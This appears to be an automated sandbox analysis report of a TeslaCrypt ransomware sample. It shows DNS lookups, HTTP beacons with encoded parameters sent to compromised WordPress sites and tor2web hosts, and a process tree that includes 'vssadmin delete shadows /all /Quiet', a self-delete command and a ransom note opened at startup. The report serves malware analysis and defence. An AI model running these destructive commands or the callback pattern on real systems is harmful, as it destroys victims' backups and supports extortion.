                                                                                                                          Jan 8, 2025 21:11:23.803735971 CET4916380192.168.2.2234.117.59.81
                                                                                                                          Jan 8, 2025 21:11:24.173978090 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:24.773401022 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:25.970403910 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:28.375252008 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:33.174930096 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:42.790431976 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:12:07.842947960 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:07.842983961 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:07.843043089 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:07.843436956 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:07.843451977 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.500659943 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.501429081 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:08.501452923 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.501843929 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.506295919 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:08.506378889 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.715336084 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.715379953 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:08.715395927 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:18.416090012 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:18.416155100 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:18.416202068 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:20.059580088 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:20.059606075 CET44349178172.217.168.68192.168.2.22
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 8, 2025 21:10:08.656404018 CET | 192.168.2.22 | 8.8.8.8 | d006 | (Port unreachable) | Destination Unreachable
Jan 8, 2025 21:11:04.572544098 CET | 192.168.2.22 | 8.8.8.8 | d04c | (Port unreachable) | Destination Unreachable

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 21:09:37.302721977 CET | 192.168.2.22 | 8.8.8.8 | 0x270e | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:09:37.862337112 CET | 192.168.2.22 | 8.8.8.8 | 0xda68 | Standard query (0) | ezglobalmarketing.com | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:09:37.878921986 CET | 192.168.2.22 | 8.8.8.8 | 0xbc57 | Standard query (0) | fgainterests.com | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:09:59.419549942 CET | 192.168.2.22 | 8.8.8.8 | 0xbaac | Standard query (0) | ledshoppen.nl | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:01.998435974 CET | 192.168.2.22 | 8.8.8.8 | 0x28ea | Standard query (0) | serenitynowbooksandgifts.com | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:03.342324972 CET | 192.168.2.22 | 8.8.8.8 | 0xb412 | Standard query (0) | www.serenitynowbooksandgifts.com | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:04.744935036 CET | 192.168.2.22 | 8.8.8.8 | 0xdc80 | Standard query (0) | teenpornotube.org | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:05.438707113 CET | 192.168.2.22 | 8.8.8.8 | 0x5b3c | Standard query (0) | www.teenpornotube.org | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:06.094495058 CET | 192.168.2.22 | 8.8.8.8 | 0x570a | Standard query (0) | shmetterheath.ru | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:07.107826948 CET | 192.168.2.22 | 8.8.8.8 | 0x570a | Standard query (0) | shmetterheath.ru | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:08.121817112 CET | 192.168.2.22 | 8.8.8.8 | 0x570a | Standard query (0) | shmetterheath.ru | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:08.210772991 CET | 192.168.2.22 | 8.8.8.8 | 0x2867 | Standard query (0) | zpr5huq4bgmutfnf.onion.to | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:08.228147030 CET | 192.168.2.22 | 8.8.8.8 | 0xeb70 | Standard query (0) | zpr5huq4bgmutfnf.tor2web.org | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:11:07.777133942 CET | 192.168.2.22 | 8.8.8.8 | 0x534b | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:11:07.777322054 CET | 192.168.2.22 | 8.8.8.8 | 0x25a4 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 21:09:37.309180021 CET | 8.8.8.8 | 192.168.2.22 | 0x270e | No error (0) | ipinfo.io |  | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:09:37.874737024 CET | 8.8.8.8 | 192.168.2.22 | 0xda68 | Name error (3) | ezglobalmarketing.com | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:09:38.023437023 CET | 8.8.8.8 | 192.168.2.22 | 0xbc57 | No error (0) | fgainterests.com |  | 199.116.254.169 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:02.005569935 CET | 8.8.8.8 | 192.168.2.22 | 0x28ea | No error (0) | serenitynowbooksandgifts.com |  | 185.230.63.171 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:02.005569935 CET | 8.8.8.8 | 192.168.2.22 | 0x28ea | No error (0) | serenitynowbooksandgifts.com |  | 185.230.63.186 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:02.005569935 CET | 8.8.8.8 | 192.168.2.22 | 0x28ea | No error (0) | serenitynowbooksandgifts.com |  | 185.230.63.107 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:03.388170958 CET | 8.8.8.8 | 192.168.2.22 | 0xb412 | No error (0) | www.serenitynowbooksandgifts.com | cdn1.wixdns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 21:10:03.388170958 CET | 8.8.8.8 | 192.168.2.22 | 0xb412 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 21:10:03.388170958 CET | 8.8.8.8 | 192.168.2.22 | 0xb412 | No error (0) | td-ccm-neg-87-45.wixdns.net |  | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:04.786917925 CET | 8.8.8.8 | 192.168.2.22 | 0xdc80 | No error (0) | teenpornotube.org |  | 67.22.44.2 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:05.456825972 CET | 8.8.8.8 | 192.168.2.22 | 0x5b3c | No error (0) | www.teenpornotube.org | teenpornotube.org |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 21:10:05.456825972 CET | 8.8.8.8 | 192.168.2.22 | 0x5b3c | No error (0) | teenpornotube.org |  | 67.22.44.2 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:08.180713892 CET | 8.8.8.8 | 192.168.2.22 | 0x570a | Name error (3) | shmetterheath.ru | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:08.222201109 CET | 8.8.8.8 | 192.168.2.22 | 0x2867 | Name error (3) | zpr5huq4bgmutfnf.onion.to | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:08.240149975 CET | 8.8.8.8 | 192.168.2.22 | 0xeb70 | No error (0) | zpr5huq4bgmutfnf.tor2web.org |  | 103.198.0.111 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:08.656316042 CET | 8.8.8.8 | 192.168.2.22 | 0x570a | Server failure (2) | shmetterheath.ru | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:10:08.703730106 CET | 8.8.8.8 | 192.168.2.22 | 0x570a | Name error (3) | shmetterheath.ru | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 21:11:07.783598900 CET | 8.8.8.8 | 192.168.2.22 | 0x25a4 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
Jan 8, 2025 21:11:07.784039974 CET | 8.8.8.8 | 192.168.2.22 | 0x534b | No error (0) | www.google.com |  | 172.217.168.68 | A (IP address) | IN (0x0001) | false

                                                                                                                          • serenitynowbooksandgifts.com
                                                                                                                          • www.serenitynowbooksandgifts.com
                                                                                                                          • ipinfo.io
                                                                                                                          • fgainterests.com
                                                                                                                          • teenpornotube.org
                                                                                                                          • www.teenpornotube.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 34.117.59.81 | 80 | 3504 | C:\Users\user\AppData\Roaming\svcmtr.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 21:09:37.346493006 CET | 197 | OUT | GET /ip HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: ipinfo.io
Jan 8, 2025 21:09:37.818933964 CET | 241 | IN | HTTP/1.1 200 OK
date: Wed, 08 Jan 2025 20:09:36 GMT
content-type: text/plain; charset=utf-8
Content-Length: 12
access-control-allow-origin: *
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49164 | 199.116.254.169 | 80 | 3504 | C:\Users\user\AppData\Roaming\svcmtr.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 8, 2025 21:09:38.033674002 CET617OUTGET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38914A0712A28548CB1A591D5BE2241C135B0E2F3FAB94EEE9E31C6BB0B8D33BD387F667397135C5EC483A155C0151211280780DA7581A2066232DDC3477639D3CA098F5C31FAE7319AB4DAE6A2EF1B042033039ED5685D79F8FCC098B742D884D5394719058E0C8D500DE20140A325CF0B HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Host: fgainterests.com
                                                                                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 185.230.63.171 | 80 | 3504 | C:\Users\user\AppData\Roaming\svcmtr.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 8, 2025 21:10:02.023974895 CET661OUTGET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Host: serenitynowbooksandgifts.com
                                                                                                                          Connection: Keep-Alive
Jan 8, 2025 21:10:02.476206064 CET | 682 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Location: https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975
                                                                                                                          X-Seen-By: jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49168 | 67.22.44.2 | 80 | 3504 | C:\Users\user\AppData\Roaming\svcmtr.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 8, 2025 21:10:04.792625904 CET618OUTGET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25BD8C4E17EF6836F23642C06A5FF3A1CF2AEF4E14148B78507418AA0EAAE50DDC4F9D295FF1EF6F8F8C295F4189207899230F547B821D613C1DC3B1A419634028 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Host: teenpornotube.org
                                                                                                                          Connection: Keep-Alive
Jan 8, 2025 21:10:05.425394058 CET | 265 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx
                                                                                                                          Date: Wed, 08 Jan 2025 20:10:05 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Location: http://www.teenpornotube.org/wp-content/themes/r.php
                                                                                                                          Set-Cookie: RNLBSERVERID=ded6551; path=/
                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49169 | 67.22.44.2 | 80 | 3504 | C:\Users\user\AppData\Roaming\svcmtr.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 21:10:05.465303898 CET | 203 | OUT | GET /wp-content/themes/r.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Cookie: RNLBSERVERID=ded6551
Connection: Keep-Alive
Host: www.teenpornotube.org
Jan 8, 2025 21:10:06.091027975 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 08 Jan 2025 20:10:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Set-Cookie: csrfst=tZC5D9Jx-1736367006-0d9f160c0fa1a6c5; path=/
Vary: Accept-Encoding, User-Agent
                                                                                                                          Data Ascii: ="/videos/5600787" class="thumb"><picture><source srcset="http://images.cdnv.prontoservers.net/sc/5/5588/5588111/promo/crop/302x201/promo_13.webp?validfrom=1736284800&validto=1736371200&hash=V8%2FMlB4N1ZdxFBfscdKHlTkHv%2BU%3D" type="image/webp
                                                                                                                          Jan 8, 2025 21:10:06.095966101 CET1236INData Raw: 30 32 78 32 30 31 2f 70 72 6f 6d 6f 5f 31 33 2e 6a 70 67 3f 76 61 6c 69 64 66 72 6f 6d 3d 31 37 33 36 32 38 34 38 30 30 26 76 61 6c 69 64 74 6f 3d 31 37 33 36 33 37 31 32 30 30 26 68 61 73 68 3d 6e 77 5a 68 39 31 4b 6b 31 75 42 76 48 79 65 25 32
                                                                                                                          Data Ascii: 02x201/promo_13.jpg?validfrom=1736284800&validto=1736371200&hash=nwZh91Kk1uBvHye%2FXYlLXXOoUxI%3D" type="image/jpeg"><img src="http://images.cdnv.prontoservers.net/sc/5/5588/5588111/promo/crop/302x201/promo_13.jpg?validfrom=1736284800&validto=


Session ID: 0
Source IP: 192.168.2.22
Source Port: 49166
Destination IP: 185.230.63.171
Destination Port: 443
PID: 3504
Process: C:\Users\user\AppData\Roaming\svcmtr.exe

Timestamp: 2025-01-08 20:10:03 UTC, Bytes transferred: 661, Direction: OUT
GET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Host: serenitynowbooksandgifts.com
Timestamp: 2025-01-08 20:10:03 UTC, Bytes transferred: 878, Direction: IN
HTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 08 Jan 2025 20:10:03 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          location: https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975=
                                                                                                                          x-wix-cache-control: public, max-age=86400
                                                                                                                          strict-transport-security: max-age=86400
                                                                                                                          x-wix-request-id: 1736367003.224975705740410926
                                                                                                                          Age: 0
                                                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1
Timestamp: 2025-01-08 20:10:03 UTC, Bytes transferred: 487, Direction: IN
X-Seen-By: AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLu9cMEtJpWXO9F4rbPCZT44m++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRalt26NspRVtT8b01VLGY7BfOcPxFU9XGobqN4mh0/NbvIZ7fHSAOBfGBK50XnRZEyIQ==,2UNV7KOq4oGjA5+PKsX47PGnwEa4ahDGUcZoML+4h9BjP


Session ID: 1
Source IP: 192.168.2.22
Source Port: 49167
Destination IP: 34.149.87.45
Destination Port: 443
PID: 3504
Process: C:\Users\user\AppData\Roaming\svcmtr.exe

Timestamp: 2025-01-08 20:10:03 UTC, Bytes transferred: 666, Direction: OUT
GET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975= HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Host: www.serenitynowbooksandgifts.com
Timestamp: 2025-01-08 20:10:04 UTC, Bytes transferred: 1016, Direction: IN
HTTP/1.1 404 Not Found
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Language: en
                                                                                                                          Strict-Transport-Security: max-age=86400
                                                                                                                          X-Wix-Request-Id: 1736367004.62597576918143767537
                                                                                                                          Cache-Control: public,max-age=0,must-revalidate
                                                                                                                          Server: Pepyaka
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Age: 0
                                                                                                                          Date: Wed, 08 Jan 2025 20:10:04 GMT
                                                                                                                          X-Served-By: cache-iad-kcgs7200141-IAD
                                                                                                                          X-Cache: MISS
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_uw2-pub-1_g
                                                                                                                          X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,2d58ifebGbosy5xc+FRals42LSZ5E8bBqQxaDpUjQFJ2PYQ+5XrUIsPbv0s/gX53wvb3kWKRIgMIyffV4MmqLA==,2UNV7KOq4oGjA5+PKsX47PGnwEa4ahDGUcZoML+4h9BjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+JDBpdtDb0a8zNGo3JIhIcQ=,EJEd9b7dmFptmyI1HOovvzWqeDfbs7uk1J4m171zrEASO5XmrrCSQNDehIjmfew3RuKHdiN8uGiJxsD4qbIdaw==
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Via: 1.1 google
                                                                                                                          glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close



                                                                                                                          Target ID:0
                                                                                                                          Start time:15:09:30
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\0t8amSU3vd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\0t8amSU3vd.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:15:09:31
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 91%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:3
                                                                                                                          Start time:15:09:31
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL
                                                                                                                          Imagebase:0x4a970000
                                                                                                                          File size:302'592 bytes
                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:6
                                                                                                                          Start time:15:09:33
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Windows\System32\vssadmin.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                                                                                                          Imagebase:0xff880000
                                                                                                                          File size:167'424 bytes
                                                                                                                          MD5 hash:E23DD973E1444684EB36365DEFF1FC74
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:11
                                                                                                                          Start time:15:09:42
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\svcmtr.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:12
                                                                                                                          Start time:15:09:51
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\svcmtr.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:13
                                                                                                                          Start time:15:09:59
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\svcmtr.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5 hash:ED98CE8F541E6871D1F39943CE09DFA3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:17
                                                                                                                          Start time:15:10:59
                                                                                                                          Start date:08/01/2025
                                                                                                                          Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html
                                                                                                                          Imagebase:0x13fe30000
                                                                                                                          File size:3'151'128 bytes
                                                                                                                          MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:18
